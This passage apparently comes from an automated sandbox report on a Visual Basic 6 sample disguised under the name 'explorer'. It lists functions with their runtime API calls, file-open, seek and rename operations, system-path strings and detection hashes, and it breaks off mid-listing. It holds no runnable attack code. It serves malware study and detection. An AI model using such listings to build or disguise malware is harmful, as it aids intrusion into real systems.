                                                                                                                                                              • Part of subcall function 0040F8F0: __vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 0040F94D
                                                                                                                                                            • #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                            • #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                            • #609.MSVBVM60(00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC65
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6,?), ref: 0040FC70
                                                                                                                                                            • __vbaVarDup.MSVBVM60 ref: 0040FC8A
                                                                                                                                                            • #709.MSVBVM60(00000000,004055FC,000000FF,00000000,?), ref: 0040FCBF
                                                                                                                                                            • #616.MSVBVM60(00000000,00000000), ref: 0040FCCC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FCD7
                                                                                                                                                            • #650.MSVBVM60(00000008,?,00000001,00000001,00000000), ref: 0040FCEA
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FCF5
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040FCFC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FD07
                                                                                                                                                            • #535.MSVBVM60(00000000), ref: 0040FD0E
                                                                                                                                                            • __vbaStrR4.MSVBVM60 ref: 0040FD18
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FD23
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040FD2A
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FD35
                                                                                                                                                            • __vbaNameFile.MSVBVM60(00000000), ref: 0040FD3C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000006,?,00000000,?,?,?,00000000), ref: 0040FD5C
                                                                                                                                                            • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000000,?,00000000,004025E6,?), ref: 0040FD6F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$ErrorList$#529#535#580#609#616#650#709AnsiChkstkFileNameSystemUnicode
                                                                                                                                                            • String ID: yymmdd
                                                                                                                                                            • API String ID: 2807397001-2871001947
                                                                                                                                                            • Opcode ID: e917d64518279be88331d0eee65286a09dc515aaab7a2e939e415087cab1bec9
                                                                                                                                                            • Instruction ID: f15f1b85a0f637e4cae317bac7f6929bfb3b2a163c4115d7559e6a64fae5d6e2
                                                                                                                                                            • Opcode Fuzzy Hash: e917d64518279be88331d0eee65286a09dc515aaab7a2e939e415087cab1bec9
                                                                                                                                                            • Instruction Fuzzy Hash: 6951E9B5900208EBDB04DFE4DD98BDEBBB8BF48305F108129F506BB6A0DB745A49CB54
                                                                                                                                                            Function 0040C843 Relevance: 39.4, APIs: 26, Instructions: 364COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C8EF
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C94E
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?), ref: 0040C984
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040563C,00000020), ref: 0040C9C8
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 0040C9FB
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040CC42
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,0000000C), ref: 0040CD18
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0040CD31
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckHresult$ErrorFree$ChkstkExitListNew2OverflowProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 435708370-0
                                                                                                                                                            • Opcode ID: 0fb701564dfaea06c5895f1466d9b178208b09d8fd869f579df3c1af8609f287
                                                                                                                                                            • Instruction ID: a4ec598c1f86ad3a10f33067e1d5db8d23c0cfab8629dd77bc108e4b9737f716
                                                                                                                                                            • Opcode Fuzzy Hash: 0fb701564dfaea06c5895f1466d9b178208b09d8fd869f579df3c1af8609f287
                                                                                                                                                            • Instruction Fuzzy Hash: EDE11775900208EFDB14DFA4C988ADEBBB5FF48700F208269F509B7291D7759985CF64
                                                                                                                                                            Function 00418C90 Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 103COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418E00
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Error$AnsiCopySystemUnicode$BstrChkstkList
                                                                                                                                                            • String ID: `%@
                                                                                                                                                            • API String ID: 653519621-700023621
                                                                                                                                                            • Opcode ID: 47785f7da99cc1d885bec86910e85175bc0604dc897027ecb10ac562a20b6aef
                                                                                                                                                            • Instruction ID: 012eab173ab8f044d01c72bc6db05120050b8ff049b8a372a5089938a40e6a64
                                                                                                                                                            • Opcode Fuzzy Hash: 47785f7da99cc1d885bec86910e85175bc0604dc897027ecb10ac562a20b6aef
                                                                                                                                                            • Instruction Fuzzy Hash: 5E41DA76900209EBCB04EFE4DE59EDEBB78FB48305F108519F216B71A0DB75AA44CB64
                                                                                                                                                            Function 004123C0 Relevance: 34.6, APIs: 23, Instructions: 111COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,00000000,004025E6), ref: 004123DE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0041240B
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041241A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00412439
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00412448
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041245C
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041246A
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041247A
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00412481
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041248E
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004124C1
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004124C8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004124D3
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004124E3
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004124EE
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004124FE
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0041250B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00412526
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00412536
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041253D
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0041257A), ref: 0041256A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00412573
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00412590
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$BstrFile$#516#631Error$#525#570#648ChkstkCloseCopyGet3OpenOverflowSeek
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2204187013-0
                                                                                                                                                            • Opcode ID: aee74aa748bdbe5f43d680c2071f8268772085965dd0da7e2e4a6c12403588e9
                                                                                                                                                            • Instruction ID: 9955b3bf1519d9cbb4ebd4c64d53d5ed1380afe2e3f12c5c860cc2a089516978
                                                                                                                                                            • Opcode Fuzzy Hash: aee74aa748bdbe5f43d680c2071f8268772085965dd0da7e2e4a6c12403588e9
                                                                                                                                                            • Instruction Fuzzy Hash: F341E971D00248EBDB04DFA4DB5DBDEBBB5AB48305F208129E512B76A0DB785A44CB58
                                                                                                                                                            Function 004161B0 Relevance: 31.7, APIs: 21, Instructions: 182COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004075E8,00000011,00000000,72A0C33A,7294A3D7), ref: 00416207
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000040,?,00000000), ref: 00416231
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000002), ref: 00416242
                                                                                                                                                            • #537.MSVBVM60(00000000), ref: 00416252
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041625F
                                                                                                                                                            • #537.MSVBVM60(?,00000000), ref: 0041626B
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00416272
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 00416275
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00416280
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004075CC,00000000), ref: 00416288
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004162A5
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 004162D9
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 004162EF
                                                                                                                                                            • #537.MSVBVM60(?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416300
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416307
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004075E0,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041630F
                                                                                                                                                            • #537.MSVBVM60(00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416326
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041632D
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004075D8,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416335
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041636D
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004163C6), ref: 004163BF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$#537ErrorSystem$FreeList$Construct2Destruct
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2170920009-0
                                                                                                                                                            • Opcode ID: 6ebc35bea6a8f601c4351b039a5634e8cf150fa43bae1ceb42ad26cebf419b59
                                                                                                                                                            • Instruction ID: 748b6d861cac5db048dabb3adba27979951a1416e05c768a4f54423434dde149
                                                                                                                                                            • Opcode Fuzzy Hash: 6ebc35bea6a8f601c4351b039a5634e8cf150fa43bae1ceb42ad26cebf419b59
                                                                                                                                                            • Instruction Fuzzy Hash: 99518371A00219ABDB14DBB4CD45FEEBBB9EF48700F11812AE946F7291DA745D04CB94
                                                                                                                                                            Function 0040E340 Relevance: 31.7, APIs: 21, Instructions: 166COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0040E391
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E39F
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3AA
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E3D0
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040E3DD
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E3F0
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3FB
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E41B
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040E420
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E445
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004071EC,00000078), ref: 0040E465
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040E46D
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007B0), ref: 0040E494
                                                                                                                                                            • #519.MSVBVM60(?), ref: 0040E49A
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E4A5
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040E4B9
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040E4C5
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?), ref: 0040E4CF
                                                                                                                                                            • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E4FC
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0040E50E
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040E546), ref: 0040E53F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckFreeHresult$Cast$#519BstrCopyErrorEventExitListMoveProcRaise
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2502233557-0
                                                                                                                                                            • Opcode ID: 7be39dfed923fa2b8522099cfc5c1e781b78136ccb618d12821b1d76752c5173
                                                                                                                                                            • Instruction ID: 2210176cfa9892e4a02b66722b5e7dfe915d6efbf244aeeba38d0bb5bf168e27
                                                                                                                                                            • Opcode Fuzzy Hash: 7be39dfed923fa2b8522099cfc5c1e781b78136ccb618d12821b1d76752c5173
                                                                                                                                                            • Instruction Fuzzy Hash: 3D514BB1901208ABDB00DFA5DD48EEEBBB8FF48704F10856AF505B72A0D774A945CF68
                                                                                                                                                            Function 00410B60 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 84COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • #712.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BAC
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BB9
                                                                                                                                                            • #712.MSVBVM60(?,\\?\,00406674,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BCE
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BD5
                                                                                                                                                            • #712.MSVBVM60(?,\SystemRoot\,?,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BEC
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BF3
                                                                                                                                                            • #712.MSVBVM60(?,%systemroot%,?,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C0B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C12
                                                                                                                                                            • #712.MSVBVM60(?,00407458,004055FC,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C27
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C36
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00410C57,?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C50
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$#712Move$CopyFree
                                                                                                                                                            • String ID: %systemroot%$\??\$\SystemRoot\$\\?\
                                                                                                                                                            • API String ID: 2546659950-1311169778
                                                                                                                                                            • Opcode ID: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                                                                            • Instruction ID: 3cf452ae6fb0dfcbcd02110e459b44aaa686f69a821e3f1c8313cc58adc2f9c6
                                                                                                                                                            • Opcode Fuzzy Hash: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                                                                            • Instruction Fuzzy Hash: 8F214B70A54209BBCB04EB54CC82FEFBB79AB54710F204327B611B72D4DEB45945CAD4
                                                                                                                                                            Function 00418B50 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 81COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                            • String ID: (%@
                                                                                                                                                            • API String ID: 3031735744-1462787901
                                                                                                                                                            • Opcode ID: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
                                                                                                                                                            • Instruction ID: 2163017d223cc4516af4853558ee8a19d87b4fb9e6127d64d5f8f75e22c004d5
                                                                                                                                                            • Opcode Fuzzy Hash: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
                                                                                                                                                            • Instruction Fuzzy Hash: C731FBB5800209ABCB04DFE4DE59FDE7B78FB48714F108569F211B72A0D7746A48CB68
                                                                                                                                                            Function 0040FDD0 Relevance: 27.1, APIs: 18, Instructions: 122COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00401D48,004072B8,?,00000001), ref: 0040FE20
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FE2D
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004072C0,00000000), ref: 0040FE35
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FE3C
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FE40
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040FE52
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00401D48,00407390,?,-00000001), ref: 0040FE80
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE87
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004072C0,00000000,?,-00000001), ref: 0040FE8F
